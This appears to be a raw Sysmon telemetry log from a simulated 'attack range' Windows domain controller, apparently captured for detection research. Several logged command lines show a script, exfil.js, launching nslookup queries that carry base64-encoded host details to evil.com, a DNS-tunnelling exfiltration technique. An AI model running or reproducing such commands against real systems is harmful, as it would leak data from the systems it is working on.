14:21:28.057{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207584Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.057{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207583Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.057{2E1864BB-18E8-629A-1843-000000005F02}62166856C:\Windows\system32\cmd.exe{2E1864BB-18E8-629A-1A43-000000005F02}1188C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207582Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.064{2E1864BB-18E8-629A-1A43-000000005F02}1188C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A TUFDQWRkcmVzczogMDI6RjA6NEI6MUU6QUM6Q0E= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E8-629A-1843-000000005F02}6216C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A TUFDQWRkcmVzczogMDI6RjA6NEI6MUU6QUM6Q0E= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcoxhk.tmp 2>&1 10341000x8000000000000000207581Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.041{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18E8-629A-1943-000000005F02}6176C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207580Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.041{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E8-629A-1943-000000005F02}6176C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207579Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.041{2E1864BB-18E8-629A-1943-000000005F02}61767996C:\Windows\system32\conhost.exe{2E1864BB-18E8-629A-1843-000000005F02}6216C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207578Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.025{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E8-629A-1943-000000005F02}6176C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207577Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.025{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207576Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.025{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207575Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.025{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207574Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.025{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207573Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.025{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E8-629A-1843-000000005F02}6216C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207572Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.025{2E1864BB-18E0-629A-6742-000000005F02}39761960C:\Windows\System32\WScript.exe{2E1864BB-18E8-629A-1843-000000005F02}6216C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207571Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.029{2E1864BB-18E8-629A-1843-000000005F02}6216C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A TUFDQWRkcmVzczogMDI6RjA6NEI6MUU6QUM6Q0E= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcoxhk.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000207570Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.025{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nldaos.tmpMD5=1672107762ECEA7286E9D317B1D4872B,SHA256=4B917B4BC62A2EA4AC7C36E28B121764EAC51D071330300C02B5F6C0A7A1F19F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000207569Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.994{2E1864BB-18E7-629A-1643-000000005F02}77686848C:\Windows\system32\conhost.exe{2E1864BB-18E7-629A-1743-000000005F02}2628C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208362Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.980{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18E9-629A-6743-000000005F02}7868C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208361Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.980{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E9-629A-6743-000000005F02}7868C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208360Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.980{2E1864BB-18E9-629A-6743-000000005F02}78681008C:\Windows\system32\conhost.exe{2E1864BB-18E9-629A-6643-000000005F02}3596C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208359Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.979{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E9-629A-6743-000000005F02}7868C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208358Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.959{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E9-629A-6643-000000005F02}3596C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208357Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.959{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208356Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.959{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208355Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.959{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208354Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.959{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208353Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.959{2E1864BB-18E0-629A-6742-000000005F02}39767152C:\Windows\System32\WScript.exe{2E1864BB-18E9-629A-6643-000000005F02}3596C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208352Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.961{2E1864BB-18E9-629A-6643-000000005F02}3596C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nloifcqlk.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000208351Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.943{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlqzva.tmpMD5=88CB44002509C6BB2D4BC0ADC4A5E028,SHA256=FA57CD8CDA118516C9A4FB97A60BCAFFDFC289CB501CF1DABE54CCC933EB8213,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000208350Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.912{2E1864BB-18E9-629A-6443-000000005F02}23885208C:\Windows\system32\conhost.exe{2E1864BB-18E9-629A-6543-000000005F02}1700C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000208349Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.700{00000000-0000-0000-0000-000000000000}1188<unknown process>-udpfalsefalse127.0.0.1-50590-false127.0.0.1-53domain 354300x8000000000000000208348Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.698{00000000-0000-0000-0000-000000000000}1188<unknown process>-udptruefalse127.0.0.1-50590-false127.0.0.1-53domain 354300x8000000000000000208347Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.697{00000000-0000-0000-0000-000000000000}1188<unknown process>-udpfalsefalse127.0.0.1-50589-false127.0.0.1-53domain 354300x8000000000000000208346Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.697{00000000-0000-0000-0000-000000000000}1188<unknown process>-udptruefalse127.0.0.1-50589-false127.0.0.1-53domain 354300x8000000000000000208345Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.696{00000000-0000-0000-0000-000000000000}1188<unknown process>-udpfalsefalse127.0.0.1-50588-false127.0.0.1-53domain 354300x8000000000000000208344Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.696{00000000-0000-0000-0000-000000000000}1188<unknown process>-udptruefalse127.0.0.1-50588-false127.0.0.1-53domain 354300x8000000000000000208343Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.626{00000000-0000-0000-0000-000000000000}2628<unknown process>-udpfalsefalse127.0.0.1-50587-false127.0.0.1-53domain 10341000x8000000000000000208342Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 